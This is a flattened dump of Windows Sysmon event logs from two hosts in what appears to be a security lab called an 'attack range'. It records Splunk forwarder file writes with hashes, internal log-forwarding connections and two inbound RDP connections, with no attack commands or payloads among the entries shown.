Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63E1221194F764D89D00B0F4ABB74C6B,SHA256=4376BA35C323A4E5EB3DE9075F63716E5C9630AB8274BB8B61887B47E379B17D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:20.191{C8EA50B7-10F3-6216-FB04-000000003802}54965892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:21.379{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F7359CD0963288EB0C7AE7496132FCD,SHA256=99100BA56BDAC410A00050F69197321E9B73FAD5A40987484146FEFB97423169,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:21.123{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B38987B09B6529492ACA1B3E430833,SHA256=73BFBCAFECE46CDA4DE43EF98C5DA9A64D7CCBB3EF559CAB90A1933FB844AF6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:22.519{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D68F6D08BCE73E4218EBEAE4097DEFE,SHA256=D0AB593B62AF4446AD2CF53B2D7809B72EB786A9100807BE157D1B643CF961C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:22.139{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B548E601914DD8E2255BEC02A8E7E31,SHA256=D6F916C848AC2C91CC6D846AB3D4F6899FDAAAAAAE217BB2E44AA8C14CFE61A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:23.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63B118E135DE6C6FC8F3B29312BA057D,SHA256=40C5E5E93108767C6F7CDB8149904A0BC70EEE8A475D6C2075AE7AFB941A293A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:20.657{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51312-false10.0.1.12-8000- 23542300x8000000000000000216218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:23.155{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=362453B3D5863E6DA90AC32122F8AC2C,SHA256=B76FD4F689194CD4FBC5B4E8721B8A5AB9C39A0D986A70179A12B06F110225C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:24.613{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=235C1884A2102E30E82A37445B5509EB,SHA256=D4F83DC0DB384BFED27A894164FC52A3E1B08D866604F451AAA25A891A81DDC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:24.155{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C7A47DD1054E6F939FB532FB2808E1,SHA256=E1D3813BACB573D4EFF23B3BB375C11C9D0D25D1F836A9BB5696F60630685FF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:21.571{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53404-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:25.723{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C08B771C673EC6F79FC0C46C268CD94,SHA256=610976E4D928E2059BEC234D54AD91788F518CFA0A21783A1B5EA5EC5C0A3F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:25.170{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E99F6FAA86C012516E9A4102FBFF7341,SHA256=EE57F0BCC4DB600D1CF11B1BDEAB5E8E65FCF3AAA182A3117F00816773D07723,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:26.738{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92923144F0D4C8A0CDE22F5A0A24382D,SHA256=D030878AEAE40BD8AD9F15BEBFD8B5CC3040B82CC1A0C124CDA2AD42CE4A85EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:24.764{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse94.232.47.180-1379-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000216222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:26.186{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B08F4133EA4DABEAA97B81C72EBBBB,SHA256=9B3D4FA9DC1E50E0C0DC39C0E83B279F27F72BB33D1DE74D04C46ECB94BBFA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:27.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90ABB381CA9A6A1CE1515B34514C7F2,SHA256=701E85DB0C4E940400A48A99EDE259272F2A166C15AA73D7350F9DAB6A512A47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:27.202{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6755073D96EBB925FC7B15CE6DBBFB57,SHA256=16CF229F3F89989447512EF2C5571A3514E86C4C97E5570A41E81293604CB9A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:28.785{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B68462AF4DEF91D172F2FA514A8DA23,SHA256=F746818F09F07286394E3F75099E31ACBCFC0F3BF61705B187D9283C1BD8EDCE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:26.596{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51313-false10.0.1.12-8000- 23542300x8000000000000000216225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:28.217{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76CD9687C3F7B4F5A69CAF6C12D7FAE2,SHA256=2DC4A06FA2244AA5D9B396553A9D9B281ACCBED61685AD1413A88EC1E1375413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:29.941{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A934E9552AAD80E8E5B7ED0C7C38DD1,SHA256=50F20E1EF937D0B284C3612E61149BC46426E1BAE31173AE9A618A9CDCE68CCF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:27.540{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53405-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:29.233{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F44583AD667FAC6200EE42B649BCB37,SHA256=23235B984598A143FED246CB15C679C019868A1906DC5FC539B10D8EA70BCE55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:29.233{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA82DD46B84DFAF43443653E1EE78480,SHA256=60310C29B0DB89057F33A2E564181FDC26076A2C3111B924C6B1DCB32EA164FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:29.233{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3C6D915E985C3A090023E1AACDA77EC,SHA256=8A3D5C2F98D4EE8AA246422AF2478F1422FCD4E9FCD1805B0216F783D193B28B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:30.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E8555586856B057870A5BCD617A9745,SHA256=852DFDAA175A2F6C482D3C35C95F82DABD10199FB2F02A3646A6BC8711E0D658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:30.279{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A3F44C2864AA9EA90C25F0B10184D06E,SHA256=58E7437575B4A9BE385C61BC68AF0FE34EDF16038BE87FBCE5BAD29D79201369,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:30.248{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6DD61D24CBC5B0A098A90A2D374A30,SHA256=1B1F448AC8D81C9E9A8FDDD268710AAF1F767BDA93F27509B89CD17F3B6D71FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:31.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24F72DA43132EB8CD8C293807F2870F4,SHA256=0985DBF1AE1C81070A718CAD99FF04F2EF172AC30239F710ADC88C10B6D5DB08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:31.264{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DB893203CA6612BEE0C45A34DCB91B4,SHA256=D6715C86D8F7D8D16EC494CB9509659D2286243BC426E0833C343481F36ED1BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:32.279{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B367A5AF1CCC1E3D9EF840858BCFE313,SHA256=2BCF19AC225D9B05A9E14C2BFC8CE45EDDFB2BAB65590CF8708714A29C996CD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:33.332{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=35E2626E47BD37927BFF3FDCFCD3213F,SHA256=8E7F35AAE1ACD5319F46B480C8B829B60369165A0555B0E8F5BE2A1A5ACAAA5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:33.160{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29D200FCB3DD9378A2630C6FDCDCA80E,SHA256=4C8EC48F973E00DBD0EC0302AA47133EBCBFD965AC5A1D35D446DBC40710E9F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:31.689{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51314-false10.0.1.12-8000- 23542300x8000000000000000216234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:33.279{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B348162542F4CAA322AB9C52808CB28,SHA256=08D92B2367C95D4D709BC09133D291DFCB1C015F79A747F53CF84C1791DCA1B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:34.176{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1849B9CDC5DF6C3F7AF87F37050BC1DF,SHA256=D972D19F35B7B9B95DCC83A549B45434F1778A002A5D38AD613A57F4AF8F93EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:34.295{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7549637AE26A034D9720EB663A2994BD,SHA256=854D295B9C8ED0531CF658310BB1C5FD7FCE688D9397C9BFE553087D76B595D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:33.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53406-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:35.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BC364DC05D2326240F99806E2F63DC,SHA256=E5A2902FEF2B11F9D6C412CFBBFD761DA4EF13A7E3EE96A8A68CCA397D755FDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:35.311{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=191E85D2BA16D2BCB56FD519E0F6D895,SHA256=08A4B34A144C5ACD416B84E1F36F3792CE8C9A9D99D85D48530653F491AAFB18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:36.326{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FD2CB6555F90C9F9A9388B93271F406,SHA256=FC67121C95F725B2F121DAB00FBA0D00114F34AD052835C0B3222ADA06122184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:36.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2734B5AC64787835B9B2292C0B0AAA7C,SHA256=281BD3E8C8F6F53F4A9279DE94D0E8F86A4077E678C855D17FCA6282737D360F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:37.342{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CB0A12B17B8D834A65CDABD27F1C50C,SHA256=D3CEFF8F64683B8DAC5F4E4F8D85821FEC957A5391E8DDF4D6EE26E26B6F0103,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:37.269{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5676AED96759AB4F61CB0B3527F14D2D,SHA256=5FBA2866E8F74220843C04D329F82EFC3C72B5C0AC5658F808FBFE96C995B901,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:36.536{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse94.232.47.180-13676-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000216240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:38.357{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F16A2A0198C1646D553569627AB2AC,SHA256=DFA6D5C85F4B987C6C4E18B4F8396FBEC95D57ECDBF0188DAEC6AB2437BBF68F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:38.488{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08CEFEB5852E4BDA12EE68304080DFBA,SHA256=B1F0B1168CC81DC8BFCE20AD03DDBF4DC8F932BE3DEEE497E518C373B5511CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:39.738{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:39.504{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=815CE523CAC126C97F3798E8CE8386A0,SHA256=BD5A788428E7263891A868ECFB265CCE9FE7B7F0A8A9F04E8084FD258AD545C2,IMPHASH=00000000000000000000000000000000falsetrue 